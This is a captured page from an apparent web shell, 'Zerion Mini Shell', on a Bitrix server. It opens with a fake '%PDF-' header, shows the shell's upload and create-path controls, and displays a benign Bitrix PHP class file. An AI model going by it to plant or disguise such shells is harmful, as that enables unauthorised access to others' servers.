%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/bitrix/www/bitrix/modules/iblock/lib/inheritedproperty/
Upload File :
Create Path :
Current File : //home/bitrix/www/bitrix/modules/iblock/lib/inheritedproperty/elementtemplates.php

<?php
/**
 * Bitrix Framework
 * @package bitrix
 * @subpackage iblock
 */
namespace Bitrix\Iblock\InheritedProperty;

use Bitrix\Iblock\Template\Entity\Element;

class ElementTemplates extends BaseTemplate
{
	/**
	 * @param integer $iblockId Identifier of the iblock of element.
	 * @param integer $elementId Identifier of the element.
	 */
	function __construct($iblockId, $elementId)
	{
		$entity = new ElementValues($iblockId, $elementId);
		parent::__construct($entity);
	}
}

Zerion Mini Shell 1.0